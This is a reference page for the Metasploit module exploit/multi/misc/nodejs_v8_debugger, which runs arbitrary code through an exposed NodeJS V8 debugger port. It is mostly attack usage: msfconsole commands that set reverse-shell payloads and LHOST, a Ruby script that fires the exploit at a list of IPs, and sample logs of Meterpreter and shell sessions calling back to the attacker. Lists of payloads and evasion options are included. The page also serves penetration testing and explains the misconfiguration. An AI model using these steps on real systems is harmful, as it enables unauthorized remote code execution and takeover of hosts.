NodeJS Debugger Command Injection - Metasploit


This page contains detailed information about how to use the exploit/multi/misc/nodejs_v8_debugger metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: NodeJS Debugger Command Injection
Module: exploit/multi/misc/nodejs_v8_debugger
Source code: modules/exploits/multi/misc/nodejs_v8_debugger.rb
Disclosure date: 2016-08-15
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 5858
List of CVEs: -

This module uses the "evaluate" request type of the NodeJS V8 debugger protocol (version 1) to evaluate arbitrary JS and call out to other system commands. The port (default 5858) is not exposed non-locally in default configurations, but may be exposed either intentionally or via misconfiguration.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using nodejs_v8_debugger against a single host

Normally, you can use exploit/multi/misc/nodejs_v8_debugger this way:

msf > use exploit/multi/misc/nodejs_v8_debugger
msf exploit(nodejs_v8_debugger) > show targets
    ... a list of targets ...
msf exploit(nodejs_v8_debugger) > set TARGET target-id
msf exploit(nodejs_v8_debugger) > show options
    ... show and set options ...
msf exploit(nodejs_v8_debugger) > exploit

Using nodejs_v8_debugger against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your nodejs_v8_debugger will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/misc/nodejs_v8_debugger")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Current and historical versions of node (or any JS env based on the V8 JS engine) have this functionality and could be exploitable if configured to expose the JS port on an untrusted interface.

Install a version of node using any of the normal methods: * Vendor: https://nodejs.org/en/download/package-manager/ * Distro: sudo apt-get install nodejs

Alternately, use standard node docker containers as targets: $ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858 (Others at https://hub.docker.com/_/node/)

Tested on Node 7.x, 6.x, 4.x

Verification Steps


  1. Run a node process exposing the debug port node --debug=0.0.0.0:5858

  2. Exploit it and catch the callback:

msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit

(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)

Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity (such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.

Scenarios


Example Run (Node 7.x)

Victim:
$ node --version v7.10.0 $ node --debug=0.0.0.0:5858 (node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead. Debugger listening on 0.0.0.0:5858

(To exit, press ^C again or type .exit)

Attacker:
msf exploit(nodejs_v8_debugger) > exploit

[] Started reverse TCP handler on 10.0.0.141:4444 [] 127.0.0.1:5858 - Sending 745 byte payload... [] 127.0.0.1:5858 - Got success response [] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700

id (redacted)

Go back to menu.

Msfconsole Usage


Here is how the multi/misc/nodejs_v8_debugger exploit module looks in the msfconsole:

msf6 > use exploit/multi/misc/nodejs_v8_debugger

[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/misc/nodejs_v8_debugger) > show info

       Name: NodeJS Debugger Command Injection
     Module: exploit/multi/misc/nodejs_v8_debugger
   Platform: 
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-08-15

Provided by:
  Patrick Thomas <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   NodeJS

Check supported:
  Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   5858             yes       The target port (TCP)

Payload information:

Description:
  This module uses the "evaluate" request type of the NodeJS V8 
  debugger protocol (version 1) to evaluate arbitrary JS and call out 
  to other system commands. The port (default 5858) is not exposed 
  non-locally in default configurations, but may be exposed either 
  intentionally or via misconfiguration.

References:
  https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md
  https://github.com/nodejs/node/pull/8106

Module Options


This is a complete list of options available in the multi/misc/nodejs_v8_debugger exploit:

msf6 exploit(multi/misc/nodejs_v8_debugger) > show options

Module options (exploit/multi/misc/nodejs_v8_debugger):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   5858             yes       The target port (TCP)

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   NodeJS

Advanced Options


Here is a complete list of advanced options supported by the multi/misc/nodejs_v8_debugger exploit:

msf6 exploit(multi/misc/nodejs_v8_debugger) > show advanced

Module advanced options (exploit/multi/misc/nodejs_v8_debugger):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (generic/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   ARCH                                         no        The architecture that is being targeted
   PLATFORM                                     no        The platform that is being targeted
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/misc/nodejs_v8_debugger module can exploit:

msf6 exploit(multi/misc/nodejs_v8_debugger) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   NodeJS

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/misc/nodejs_v8_debugger exploit:

msf6 exploit(multi/misc/nodejs_v8_debugger) > show payloads

Compatible Payloads
===================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  payload/generic/custom                                    normal  No     Custom Payload
   1  payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2  payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5  payload/nodejs/shell_bind_tcp                             normal  No     Command Shell, Bind TCP (via nodejs)
   6  payload/nodejs/shell_reverse_tcp                          normal  No     Command Shell, Reverse TCP (via nodejs)
   7  payload/nodejs/shell_reverse_tcp_ssl                      normal  No     Command Shell, Reverse TCP SSL (via nodejs)

Evasion Options


Here is the full list of possible evasion options supported by the multi/misc/nodejs_v8_debugger exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/misc/nodejs_v8_debugger) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Got failure response: <BUF>


Here is a relevant code snippet related to the "Got failure response: <BUF>" error message:

79:	    buf = sock.get_once
80:	
81:	    if buf.include? '"command":"evaluate","success":true'
82:	      print_status("Got success response")
83:	    elsif buf.include? '"command":"evaluate","success":false'
84:	      print_error("Got failure response: #{buf}")
85:	    else
86:	      print_error("Got unexpected response: #{buf}")
87:	    end
88:	  end
89:	

Got unexpected response: <BUF>


Here is a relevant code snippet related to the "Got unexpected response: <BUF>" error message:

80:	
81:	    if buf.include? '"command":"evaluate","success":true'
82:	      print_status("Got success response")
83:	    elsif buf.include? '"command":"evaluate","success":false'
84:	      print_error("Got failure response: #{buf}")
85:	    else
86:	      print_error("Got unexpected response: #{buf}")
87:	    end
88:	  end
89:	
90:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Patrick Thomas <pst[at]coffeetocode.net>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.